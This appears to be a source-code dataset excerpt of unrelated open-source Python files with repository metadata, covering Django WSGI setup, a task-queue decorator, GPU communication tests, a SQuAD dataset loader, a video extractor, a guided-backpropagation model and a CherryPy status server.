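#   norm, subs = tlib.getTypeNorm('foo:bar', 'HeHe')
#   text = tlib.getTypeRepr('time', 1481877992000)    # human readable form
#   guid = tlib.getTypeCast('make:guid', 'someval')   # via the registered cast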
| 29.999201 | 117 | 0.557097 |
7e354fdcd835e13d146b7880183792a39679b934 | 395 | py | Python | topsecret/wsgi.py | TanCodes/TopSecrete | 6727bf19caceda73393c9899bc0fe51b2750beff | [
"MIT"
] | null | null | null | topsecret/wsgi.py | TanCodes/TopSecrete | 6727bf19caceda73393c9899bc0fe51b2750beff | [
"MIT"
] | null | null | null | topsecret/wsgi.py | TanCodes/TopSecrete | 6727bf19caceda73393c9899bc0fe51b2750beff | [
"MIT"
] | null | null | null | """
WSGI config for topsecret project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'topsecret.settings')
application = get_wsgi_application()
| 23.235294 | 78 | 0.787342 |
f2163ea564896481fd07cc51e04bfd48bf63d724 | 1,060 | py | Python | botoy/decorators/_queued_up.py | First-frost/botoy | 20a6f32c61beb045a9dbea11f0b1744fc6a40a60 | [
"MIT"
] | 1 | 2021-06-17T10:20:45.000Z | 2021-06-17T10:20:45.000Z | botoy/decorators/_queued_up.py | First-frost/botoy | 20a6f32c61beb045a9dbea11f0b1744fc6a40a60 | [
"MIT"
] | null | null | null | botoy/decorators/_queued_up.py | First-frost/botoy | 20a6f32c61beb045a9dbea11f0b1744fc6a40a60 | [
"MIT"
] | null | null | null | import functools
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from botoy.log import logger
class TaskThread(Thread):
def __init__(self):
super().__init__()
self.tasks = Queue(maxsize=-1)
self.setDaemon(True)
self.start()
def run(self):
while True:
try:
self.tasks.get()()
except Exception as e:
                logger.warning(f"queued_up decorator: queued task failed: {e}")
finally:
self.tasks.task_done()
time.sleep(1)
def put_task(self, target, *args):
task = functools.partial(target, *args)
self.tasks.put(task)
taskThread_dict = defaultdict(TaskThread)
def queued_up(func=None, *, name="default"):
    """Run the decorated function through a task queue.
    :param name: queue group name; different names use different queues
"""
if func is None:
return functools.partial(queued_up, name=name)
def inner(ctx):
task_thread = taskThread_dict[repr(name)]
task_thread.put_task(func, ctx)
return inner
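# Illustrative usage sketch (not part of the original module); the handler names
# and the receive context `ctx` are hypothetical:
#
#   @queued_up
#   def default_handler(ctx):
#       ...   # runs through the shared "default" queue, one task at a time
#
#   @queued_up(name="slow")
#   def slow_handler(ctx):
#       ...   # runs through a separate "slow" queue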
| 22.553191 | 58 | 0.609434 |
5a6e0bc0308d72f6efdcbbe1a232a38d09ae16a0 | 69 | py | Python | {{cookiecutter.project_name}}/{{cookiecutter.app_name}}/api/resources/__init__.py | DevAerial/flask-api-template | 6d3f745f2dacb793c4bdc6aaaceb86eb472efe55 | [
"MIT"
] | null | null | null | {{cookiecutter.project_name}}/{{cookiecutter.app_name}}/api/resources/__init__.py | DevAerial/flask-api-template | 6d3f745f2dacb793c4bdc6aaaceb86eb472efe55 | [
"MIT"
] | null | null | null | {{cookiecutter.project_name}}/{{cookiecutter.app_name}}/api/resources/__init__.py | DevAerial/flask-api-template | 6d3f745f2dacb793c4bdc6aaaceb86eb472efe55 | [
"MIT"
] | null | null | null | from .ping import ping_namespace
__all__ = [
'ping_namespace',
] | 13.8 | 32 | 0.710145 |
6136dd4840378b5de37875e850dfaa1054730bf9 | 6,343 | py | Python | tests/test_send_recv_two_workers.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 76 | 2019-06-08T04:03:39.000Z | 2022-01-07T20:34:23.000Z | tests/test_send_recv_two_workers.py | rapidsai/ucx-py | e28d770aa0b47c0e63c2e7e61649f1b355560e8a | [
"BSD-3-Clause"
] | 644 | 2019-06-04T23:06:02.000Z | 2022-02-24T11:17:45.000Z | tests/test_send_recv_two_workers.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 32 | 2019-08-14T09:22:02.000Z | 2022-01-21T20:17:50.000Z | import asyncio
import multiprocessing
import os
import random
import numpy as np
import pytest
from utils import am_recv, am_send, get_cuda_devices, get_num_gpus, recv, send
import ucp
cupy = pytest.importorskip("cupy")
rmm = pytest.importorskip("rmm")
distributed = pytest.importorskip("distributed")
cloudpickle = pytest.importorskip("cloudpickle")
ITERATIONS = 30
async def get_ep(name, port):
addr = ucp.get_address()
ep = await ucp.create_endpoint(addr, port)
return ep
def register_am_allocators():
ucp.register_am_allocator(lambda n: np.empty(n, dtype=np.uint8), "host")
ucp.register_am_allocator(lambda n: rmm.DeviceBuffer(size=n), "cuda")
def client(port, func, comm_api):
# wait for server to come up
# receive cudf object
# deserialize
    # assert deserialized msg is cudf
# send receipt
from distributed.utils import nbytes
ucp.init()
if comm_api == "am":
register_am_allocators()
# must create context before importing
# cudf/cupy/etc
async def read():
await asyncio.sleep(1)
ep = await get_ep("client", port)
msg = None
import cupy
cupy.cuda.set_allocator(None)
for i in range(ITERATIONS):
if comm_api == "tag":
frames, msg = await recv(ep)
else:
frames, msg = await am_recv(ep)
close_msg = b"shutdown listener"
if comm_api == "tag":
close_msg_size = np.array([len(close_msg)], dtype=np.uint64)
await ep.send(close_msg_size)
await ep.send(close_msg)
else:
await ep.am_send(close_msg)
print("Shutting Down Client...")
return msg["data"]
rx_cuda_obj = asyncio.get_event_loop().run_until_complete(read())
rx_cuda_obj + rx_cuda_obj
num_bytes = nbytes(rx_cuda_obj)
print(f"TOTAL DATA RECEIVED: {num_bytes}")
cuda_obj_generator = cloudpickle.loads(func)
pure_cuda_obj = cuda_obj_generator()
if isinstance(rx_cuda_obj, cupy.ndarray):
cupy.testing.assert_allclose(rx_cuda_obj, pure_cuda_obj)
else:
from cudf.testing._utils import assert_eq
assert_eq(rx_cuda_obj, pure_cuda_obj)
def server(port, func, comm_api):
# create listener receiver
# write cudf object
# confirm message is sent correctly
from distributed.comm.utils import to_frames
from distributed.protocol import to_serialize
ucp.init()
if comm_api == "am":
register_am_allocators()
async def f(listener_port):
# coroutine shows up when the client asks
# to connect
async def write(ep):
import cupy
cupy.cuda.set_allocator(None)
print("CREATING CUDA OBJECT IN SERVER...")
cuda_obj_generator = cloudpickle.loads(func)
cuda_obj = cuda_obj_generator()
msg = {"data": to_serialize(cuda_obj)}
frames = await to_frames(msg, serializers=("cuda", "dask", "pickle"))
for i in range(ITERATIONS):
# Send meta data
if comm_api == "tag":
await send(ep, frames)
else:
await am_send(ep, frames)
print("CONFIRM RECEIPT")
close_msg = b"shutdown listener"
if comm_api == "tag":
msg_size = np.empty(1, dtype=np.uint64)
await ep.recv(msg_size)
msg = np.empty(msg_size[0], dtype=np.uint8)
await ep.recv(msg)
else:
msg = await ep.am_recv()
recv_msg = msg.tobytes()
assert recv_msg == close_msg
print("Shutting Down Server...")
await ep.close()
lf.close()
lf = ucp.create_listener(write, port=listener_port)
try:
while not lf.closed():
await asyncio.sleep(0.1)
except ucp.UCXCloseError:
pass
loop = asyncio.get_event_loop()
loop.run_until_complete(f(port))
def dataframe():
import numpy as np
import cudf
# always generate the same random numbers
np.random.seed(0)
size = 2 ** 26
return cudf.DataFrame(
{"a": np.random.random(size), "b": np.random.random(size)},
index=np.random.randint(size, size=size),
)
def series():
import cudf
return cudf.Series(np.arange(90000))
def empty_dataframe():
import cudf
return cudf.DataFrame({"a": [1.0], "b": [1.0]}).head(0)
def cupy_obj():
import cupy
size = 10 ** 8
return cupy.arange(size)
@pytest.mark.slow
@pytest.mark.skipif(
get_num_gpus() <= 2, reason="Machine does not have more than two GPUs"
)
@pytest.mark.parametrize(
"cuda_obj_generator", [dataframe, empty_dataframe, series, cupy_obj]
)
@pytest.mark.parametrize("comm_api", ["tag", "am"])
def test_send_recv_cu(cuda_obj_generator, comm_api):
if comm_api == "am" and not ucp._libs.ucx_api.is_am_supported():
pytest.skip("AM only supported in UCX >= 1.11")
base_env = os.environ
env_client = base_env.copy()
# grab first two devices
cvd = get_cuda_devices()[:2]
cvd = ",".join(map(str, cvd))
# reverse CVD for other worker
env_client["CUDA_VISIBLE_DEVICES"] = cvd[::-1]
port = random.randint(13000, 15500)
# serialize function and send to the client and server
# server will use the return value of the contents,
# serialize the values, then send serialized values to client.
# client will compare return values of the deserialized
# data sent from the server
func = cloudpickle.dumps(cuda_obj_generator)
ctx = multiprocessing.get_context("spawn")
server_process = ctx.Process(
name="server", target=server, args=[port, func, comm_api]
)
client_process = ctx.Process(
name="client", target=client, args=[port, func, comm_api]
)
server_process.start()
# cudf will ping the driver for validity of device
# this will influence device on which a cuda context is created.
# work around is to update env with new CVD before spawning
os.environ.update(env_client)
client_process.start()
server_process.join()
client_process.join()
assert server_process.exitcode == 0
assert client_process.exitcode == 0
| 27.458874 | 81 | 0.630301 |
1cbc305d4a15cd75f313c243d285e44a70273276 | 7,613 | py | Python | src/transformers/data/datasets/squad.py | dmlap/transformers | 79588e6fdb5af8add092fc27dd695ea1ebc68b18 | [
"Apache-2.0"
] | 77 | 2020-11-12T18:40:25.000Z | 2022-03-27T06:41:30.000Z | src/transformers/data/datasets/squad.py | dmlap/transformers | 79588e6fdb5af8add092fc27dd695ea1ebc68b18 | [
"Apache-2.0"
] | 7 | 2021-03-11T14:00:58.000Z | 2022-01-18T05:51:22.000Z | src/transformers/data/datasets/squad.py | dmlap/transformers | 79588e6fdb5af8add092fc27dd695ea1ebc68b18 | [
"Apache-2.0"
] | 23 | 2020-12-08T12:42:24.000Z | 2022-02-11T13:55:24.000Z | import logging
import os
import time
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List, Optional, Union
import torch
from filelock import FileLock
from torch.utils.data.dataset import Dataset
from ...modeling_auto import MODEL_FOR_QUESTION_ANSWERING_MAPPING
from ...tokenization_utils import PreTrainedTokenizer
from ..processors.squad import SquadFeatures, SquadV1Processor, SquadV2Processor, squad_convert_examples_to_features
logger = logging.getLogger(__name__)
MODEL_CONFIG_CLASSES = list(MODEL_FOR_QUESTION_ANSWERING_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class SquadDataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
model_type: str = field(
default=None, metadata={"help": "Model type selected in the list: " + ", ".join(MODEL_TYPES)}
)
data_dir: str = field(
default=None, metadata={"help": "The input data dir. Should contain the .json files for the SQuAD task."}
)
max_seq_length: int = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
doc_stride: int = field(
default=128,
metadata={"help": "When splitting up a long document into chunks, how much stride to take between chunks."},
)
max_query_length: int = field(
default=64,
metadata={
"help": "The maximum number of tokens for the question. Questions longer than this will "
"be truncated to this length."
},
)
max_answer_length: int = field(
default=30,
metadata={
"help": "The maximum length of an answer that can be generated. This is needed because the start "
"and end predictions are not conditioned on one another."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
version_2_with_negative: bool = field(
default=False, metadata={"help": "If true, the SQuAD examples contain some that do not have an answer."}
)
null_score_diff_threshold: float = field(
default=0.0, metadata={"help": "If null_score - best_non_null is greater than the threshold predict null."}
)
n_best_size: int = field(
default=20, metadata={"help": "If null_score - best_non_null is greater than the threshold predict null."}
)
lang_id: int = field(
default=0,
metadata={
"help": "language id of input for language-specific xlm models (see tokenization_xlm.PRETRAINED_INIT_CONFIGURATION)"
},
)
threads: int = field(default=1, metadata={"help": "multiple threads for converting example to features"})
class Split(Enum):
train = "train"
dev = "dev"
class SquadDataset(Dataset):
"""
This will be superseded by a framework-agnostic approach
soon.
"""
args: SquadDataTrainingArguments
features: List[SquadFeatures]
mode: Split
is_language_sensitive: bool
def __init__(
self,
args: SquadDataTrainingArguments,
tokenizer: PreTrainedTokenizer,
limit_length: Optional[int] = None,
mode: Union[str, Split] = Split.train,
is_language_sensitive: Optional[bool] = False,
cache_dir: Optional[str] = None,
):
self.args = args
self.is_language_sensitive = is_language_sensitive
self.processor = SquadV2Processor() if args.version_2_with_negative else SquadV1Processor()
if isinstance(mode, str):
try:
mode = Split[mode]
except KeyError:
raise KeyError("mode is not a valid split name")
self.mode = mode
# Load data features from cache or dataset file
version_tag = "v2" if args.version_2_with_negative else "v1"
cached_features_file = os.path.join(
cache_dir if cache_dir is not None else args.data_dir,
"cached_{}_{}_{}_{}".format(
mode.value, tokenizer.__class__.__name__, str(args.max_seq_length), version_tag,
),
)
# Make sure only the first process in distributed training processes the dataset,
# and the others will use the cache.
lock_path = cached_features_file + ".lock"
with FileLock(lock_path):
if os.path.exists(cached_features_file) and not args.overwrite_cache:
start = time.time()
self.features = torch.load(cached_features_file)
logger.info(
f"Loading features from cached file {cached_features_file} [took %.3f s]", time.time() - start
)
else:
if mode == Split.dev:
examples = self.processor.get_dev_examples(args.data_dir)
else:
examples = self.processor.get_train_examples(args.data_dir)
self.features = squad_convert_examples_to_features(
examples=examples,
tokenizer=tokenizer,
max_seq_length=args.max_seq_length,
doc_stride=args.doc_stride,
max_query_length=args.max_query_length,
is_training=mode == Split.train,
threads=args.threads,
)
start = time.time()
torch.save(self.features, cached_features_file)
# ^ This seems to take a lot of time so I want to investigate why and how we can improve.
logger.info(
"Saving features into cached file %s [took %.3f s]", cached_features_file, time.time() - start
)
def __len__(self):
return len(self.features)
def __getitem__(self, i) -> Dict[str, torch.Tensor]:
# Convert to Tensors and build dataset
feature = self.features[i]
input_ids = torch.tensor(feature.input_ids, dtype=torch.long)
attention_mask = torch.tensor(feature.attention_mask, dtype=torch.long)
token_type_ids = torch.tensor(feature.token_type_ids, dtype=torch.long)
cls_index = torch.tensor(feature.cls_index, dtype=torch.long)
p_mask = torch.tensor(feature.p_mask, dtype=torch.float)
is_impossible = torch.tensor(feature.is_impossible, dtype=torch.float)
inputs = {
"input_ids": input_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
}
if self.args.model_type in ["xlm", "roberta", "distilbert", "camembert"]:
del inputs["token_type_ids"]
if self.args.model_type in ["xlnet", "xlm"]:
inputs.update({"cls_index": cls_index, "p_mask": p_mask})
if self.args.version_2_with_negative:
inputs.update({"is_impossible": is_impossible})
if self.is_language_sensitive:
inputs.update({"langs": (torch.ones(input_ids.shape, dtype=torch.int64) * self.args.lang_id)})
if self.mode == Split.train:
start_positions = torch.tensor(feature.start_position, dtype=torch.long)
end_positions = torch.tensor(feature.end_position, dtype=torch.long)
inputs.update({"start_positions": start_positions, "end_positions": end_positions})
return inputs
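# Illustrative usage sketch (not part of the original module); the tokenizer name
# and data directory are made up:
#   from transformers import AutoTokenizer
#   tokenizer = AutoTokenizer.from_pretrained("bert-base-uncased")
#   args = SquadDataTrainingArguments(model_type="bert", data_dir="./squad")
#   dataset = SquadDataset(args, tokenizer, mode="train")
#   batch_item = dataset[0]   # dict of tensors: input_ids, attention_mask, ...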
| 39.445596 | 128 | 0.635623 |
d951b9b1bd59e8dc6e41eacd39b47b838ef26a6f | 502 | py | Python | file_picker/wymeditor/widgets.py | caktus/django-file-picker | 6b5503714ce6acb3f8adebd1d4867eb7d9d8690b | [
"BSD-3-Clause"
] | 12 | 2015-12-24T10:12:33.000Z | 2021-09-20T01:58:44.000Z | file_picker/wymeditor/widgets.py | caktus/django-file-picker | 6b5503714ce6acb3f8adebd1d4867eb7d9d8690b | [
"BSD-3-Clause"
] | 11 | 2016-08-31T18:28:02.000Z | 2017-12-14T15:56:20.000Z | file_picker/wymeditor/widgets.py | caktus/django-file-picker | 6b5503714ce6acb3f8adebd1d4867eb7d9d8690b | [
"BSD-3-Clause"
] | 7 | 2015-12-24T10:12:52.000Z | 2020-12-21T04:25:26.000Z | from file_picker.widgets import FilePickerWidget
class WYMeditorWidget(FilePickerWidget):
def __init__(self, pickers, *args, **kwargs):
kwargs['classes'] = ['wymeditor']
super(WYMeditorWidget, self).__init__(pickers, *args, **kwargs)
class Media:
css = {"all": ("css/filepicker.overlay.css",)}
js = ("js/ajaxupload.js",
"js/jquery.filepicker.js",
"wymeditor/jquery.wymeditor.js",
"js/jquery.wymeditor.filepicker.js")
| 33.466667 | 71 | 0.623506 |
fad1ec108a7608a0411c633805889be4b8dc4cf2 | 1,580 | py | Python | youtuatools/extractor/adobeconnect.py | Pagasis/YouTua | edb44b2065a7224f8b26aaf76166bf7287901567 | [
"MIT"
] | 47 | 2021-01-02T07:44:50.000Z | 2022-02-28T22:02:13.000Z | youtuatools/extractor/adobeconnect.py | Pagasis/YouTua | edb44b2065a7224f8b26aaf76166bf7287901567 | [
"MIT"
] | 4 | 2021-02-07T03:35:13.000Z | 2021-10-31T19:23:53.000Z | youtuatools/extractor/adobeconnect.py | Pagasis/YouTua | edb44b2065a7224f8b26aaf76166bf7287901567 | [
"MIT"
] | 8 | 2021-01-03T05:44:39.000Z | 2021-11-01T05:46:32.000Z | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_parse_qs,
compat_urlparse,
)
class AdobeConnectIE(InfoExtractor):
_VALID_URL = r"https?://\w+\.adobeconnect\.com/(?P<id>[\w-]+)"
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(r"<title>(.+?)</title>", webpage, "title")
qs = compat_parse_qs(
self._search_regex(r"swfUrl\s*=\s*'([^']+)'", webpage, "swf url").split(
"?"
)[1]
)
is_live = qs.get("isLive", ["false"])[0] == "true"
formats = []
for con_string in qs["conStrings"][0].split(","):
formats.append(
{
"format_id": con_string.split("://")[0],
"app": compat_urlparse.quote(
"?"
+ con_string.split("?")[1]
+ "flvplayerapp/"
+ qs["appInstance"][0]
),
"ext": "flv",
"play_path": "mp4:" + qs["streamName"][0],
"rtmp_conn": "S:" + qs["ticket"][0],
"rtmp_live": is_live,
"url": con_string,
}
)
return {
"id": video_id,
"title": self._live_title(title) if is_live else title,
"formats": formats,
"is_live": is_live,
}
| 32.244898 | 84 | 0.458228 |
aec0ed959af42134c26851511fb4c0e33a4ade2c | 869 | py | Python | neighbor/urls.py | Barrack-coder/Neighborhood | 5b5a304850b205962d6ddb975e6ae213a5a21ba4 | [
"MIT"
] | null | null | null | neighbor/urls.py | Barrack-coder/Neighborhood | 5b5a304850b205962d6ddb975e6ae213a5a21ba4 | [
"MIT"
] | null | null | null | neighbor/urls.py | Barrack-coder/Neighborhood | 5b5a304850b205962d6ddb975e6ae213a5a21ba4 | [
"MIT"
] | null | null | null | """neighbor URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
# from django.urls import path
from django.conf.urls import url,include
from django.contrib.auth import views
urlpatterns = [
url('admin/', admin.site.urls),
url('', include('hood.urls')),
]
| 33.423077 | 77 | 0.70771 |
058958c71b2d956d804f3b4a48f02e79f283ad47 | 6,321 | py | Python | propagation/gen_guided_model/guided_model.py | naivete5656/WSISPDR | 1dc4d1bf24a6ebf7efd3c75d3f1a9edbe849d38b | [
"MIT"
] | 37 | 2019-10-09T09:42:24.000Z | 2022-03-29T09:57:29.000Z | propagation/gen_guided_model/guided_model.py | naivete5656/WSISPDR | 1dc4d1bf24a6ebf7efd3c75d3f1a9edbe849d38b | [
"MIT"
] | 4 | 2020-02-26T06:49:02.000Z | 2021-10-17T16:29:24.000Z | propagation/gen_guided_model/guided_model.py | naivete5656/WSISPDR | 1dc4d1bf24a6ebf7efd3c75d3f1a9edbe849d38b | [
"MIT"
] | 4 | 2019-10-18T07:34:30.000Z | 2020-04-10T03:35:34.000Z | from types import MethodType
import torch.nn as nn
from .guided_parts import guide_relu
from utils import local_maxima, gaus_filter
from scipy.io import savemat
import numpy as np
import cv2
from torch.nn.modules import Module
from collections import OrderedDict
from itertools import islice
import operator
import torch
class Sequ(Module):
r"""A sequential container.
Modules will be added to it in the order they are passed in the constructor.
Alternatively, an ordered dict of modules can also be passed in.
To make it easier to understand, here is a small example::
# Example of using Sequential
model = nn.Sequential(
nn.Conv2d(1,20,5),
nn.ReLU(),
nn.Conv2d(20,64,5),
nn.ReLU()
)
# Example of using Sequential with OrderedDict
model = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(1,20,5)),
('relu1', nn.ReLU()),
('conv2', nn.Conv2d(20,64,5)),
('relu2', nn.ReLU())
]))
"""
def __init__(self, *args):
super(Sequ, self).__init__()
if len(args) == 1 and isinstance(args[0], OrderedDict):
for key, module in args[0].items():
self.add_module(key, module)
else:
for idx, module in enumerate(args):
self.add_module(str(idx), module)
def _get_item_by_idx(self, iterator, idx):
"""Get the idx-th item of the iterator"""
size = len(self)
idx = operator.index(idx)
if not -size <= idx < size:
raise IndexError("index {} is out of range".format(idx))
idx %= size
return next(islice(iterator, idx, None))
def __getitem__(self, idx):
if isinstance(idx, slice):
return self.__class__(OrderedDict(list(self._modules.items())[idx]))
else:
return self._get_item_by_idx(self._modules.values(), idx)
def __setitem__(self, idx, module):
key = self._get_item_by_idx(self._modules.keys(), idx)
return setattr(self, key, module)
def __delitem__(self, idx):
if isinstance(idx, slice):
for key in list(self._modules.keys())[idx]:
delattr(self, key)
else:
key = self._get_item_by_idx(self._modules.keys(), idx)
delattr(self, key)
def __len__(self):
return len(self._modules)
def __dir__(self):
keys = super(Sequ, self).__dir__()
keys = [key for key in keys if not key.isdigit()]
return keys
def forward(self, input, input2):
for module in self._modules.values():
input = module(input, input2)
return input
class GuidedModel(nn.Sequential):
def __init__(self, *args, **kargs):
super().__init__(*args)
self.inferencing = False
self.shape = None
def _patch(self):
for module in self.modules():
if isinstance(module, nn.ReLU):
module._original_forward = module.forward
module.forward = MethodType(guide_relu, module)
def _recover(self):
for module in self.modules():
if isinstance(module, nn.ReLU) and hasattr(module, "_original_forward"):
module.forward = module._original_forward
def forward(
self,
img,
root_path,
peak=None,
class_threshold=0,
peak_threshold=30,
retrieval_cfg=None,
):
assert img.dim() == 4, "PeakResponseMapping layer only supports batch mode."
if self.inferencing:
img.requires_grad_()
# classification network forwarding
class_response_maps = super().forward(img)
# peak backpropagation
# grad_output = mask
pre_img = class_response_maps.detach().cpu().numpy()[0, 0]
self.shape = pre_img.shape
if peak is None:
cv2.imwrite(
str(root_path.joinpath("detection.png")),
(pre_img * 255).astype(np.uint8),
)
# peak
peaks = local_maxima((pre_img * 255).astype(np.uint8), 125, 2).astype(np.int)
gauses = []
try:
for peak in peaks:
temp = np.zeros(self.shape)
temp[peak[1], peak[0]] = 255
gauses.append(gaus_filter(temp, 401, 12))
region = np.argmax(gauses, axis=0) + 1
likely_map = np.max(gauses, axis=0)
region[likely_map < 0.01] = 0
#
# r, g, b = np.loadtxt("./utils/color.csv", delimiter=",")
except ValueError:
region = np.zeros(self.shape, dtype=np.uint8)
likely_map = np.zeros(self.shape)
gbs = []
# each propagate
peaks = np.insert(peaks, 0, [0, 0], axis=0)
with open(root_path.joinpath("peaks.txt"), mode="w") as f:
f.write("ID,x,y\n")
for i in range(region.max() + 1):
if img.grad is not None:
img.grad.zero_()
# f.write(f"{i},{peaks[i, 0]},{peaks[i ,1]}\n")
f.write("{},{},{}\n".format(i, peaks[i, 0], peaks[i, 1]))
mask = np.zeros(self.shape, dtype=np.float32)
mask[region == i] = 1
mask = mask.reshape([1, 1, self.shape[0], self.shape[1]])
mask = torch.from_numpy(mask)
mask = mask.cuda()
class_response_maps.backward(mask, retain_graph=True)
result = img.grad.detach().sum(1).clone().clamp(min=0).cpu().numpy()
save_path = root_path.joinpath("each_peak")
save_path.mkdir(parents=True, exist_ok=True)
savemat(
str(save_path.joinpath("{:04d}.mat".format(i))),
{"image": result[0], "mask": mask},
)
gbs.append(result[0])
return gbs
def train(self, mode=True):
super().train(mode)
if self.inferencing:
self._recover()
self.inferencing = False
return self
def inference(self):
super().train(False)
self._patch()
self.inferencing = True
return self
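# Illustrative usage sketch (not part of the original module); the backbone
# network, input tensor and output directory are hypothetical:
#   model = GuidedModel(backbone_cnn).cuda()
#   model.inference()                        # patch ReLUs for guided backprop
#   grads = model(img_tensor, root_path)     # per-peak guided gradients, saved as .mat
#   model.train()                            # restore the original ReLU forward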
| 33.444444 | 85 | 0.548647 |
9605126c5775e62303bf9a91c4ebe83781902489 | 673 | py | Python | src/braket/_schemas/_version.py | indisoluble/amazon-braket-schemas-python | d08bab112c93d21d176a4f1b2ca5d1e9d995fdf1 | [
"Apache-2.0"
] | 1 | 2021-07-10T15:29:30.000Z | 2021-07-10T15:29:30.000Z | src/braket/_schemas/_version.py | indisoluble/amazon-braket-schemas-python | d08bab112c93d21d176a4f1b2ca5d1e9d995fdf1 | [
"Apache-2.0"
] | null | null | null | src/braket/_schemas/_version.py | indisoluble/amazon-braket-schemas-python | d08bab112c93d21d176a4f1b2ca5d1e9d995fdf1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Version information.
Version number (major.minor.patch[-label])
"""
__version__ = "1.2.2.dev0"
| 35.421053 | 78 | 0.73997 |
c77898e0019bba06f61d9af816a57a28762396ee | 3,581 | py | Python | filament_watch/web_server.py | rllynch/filament_watch | 4db5d0c1ddb2498696b3f6e4bb86c16ad1182a3e | [
"MIT"
] | 7 | 2016-01-12T04:39:35.000Z | 2018-09-03T19:40:21.000Z | filament_watch/web_server.py | rllynch/filament_watch | 4db5d0c1ddb2498696b3f6e4bb86c16ad1182a3e | [
"MIT"
] | 2 | 2017-02-21T20:28:49.000Z | 2018-01-24T19:09:29.000Z | filament_watch/web_server.py | rllynch/filament_watch | 4db5d0c1ddb2498696b3f6e4bb86c16ad1182a3e | [
"MIT"
] | 6 | 2016-09-29T22:22:58.000Z | 2019-11-18T04:42:11.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
web_server.py
Web server to serve filament_watch status
"""
##############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) 2015 Richard L. Lynch <rich@richlynch.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
##############################################################################
import os
import json
import time
import cherrypy
class WebGen(object):
'''CherryPy generator for web server'''
def __init__(self):
self.state = {}
self.log_msgs = ''
@cherrypy.expose
def gen_change(self, _=None):
'''Dynamically updating data'''
cherrypy.response.headers['Content-Type'] = 'text/json'
self.state['log_msgs'] = self.log_msgs
return json.dumps(self.state)
class WebServer(object):
'''Main interface to web server'''
def __init__(self, port, show_cherrypy_logs):
self.webgen = None
self.port = port
self.log_msgs = []
self.show_cherrypy_logs = show_cherrypy_logs
def start(self):
'''Start web server'''
script_dir = os.path.dirname(os.path.abspath(__file__))
http_config = {
'server.socket_host': '0.0.0.0',
'server.socket_port': self.port
}
mount_config = {
'/': {
'tools.staticdir.on': True,
'tools.staticdir.root': script_dir,
'tools.staticdir.dir': './static_www',
'tools.staticdir.index': 'index.html'
}
}
self.webgen = WebGen()
cherrypy.config.update(http_config)
cherrypy.tree.mount(self.webgen, '/', mount_config)
# Disable redundant logging to screen
cherrypy.log.screen = False
if not self.show_cherrypy_logs:
# Disable propagation to root logger
#cherrypy.log.error_log.propagate = False
cherrypy.log.access_log.propagate = False
cherrypy.engine.start()
def update(self, state):
'''Update dynamic data'''
self.webgen.state = state
def log(self, msg):
'''Append a log message'''
timestamp = time.strftime('%H:%M:%S', time.localtime())
self.log_msgs.append('%s: %s<br/>\n' % (timestamp, msg))
if len(self.log_msgs) > 5:
self.log_msgs.pop(0)
self.webgen.log_msgs = '\n'.join(self.log_msgs)
def stop(self):
'''Stop web server'''
cherrypy.engine.stop()
self.webgen = None
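# Illustrative usage sketch (not part of the original module); the port and the
# status payload are made up:
#   server = WebServer(port=8080, show_cherrypy_logs=False)
#   server.start()
#   server.update({'alarm': False, 'filament_mm': 123.4})   # served via /gen_change
#   server.log('print started')
#   server.stop()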
| 34.432692 | 78 | 0.615191 |
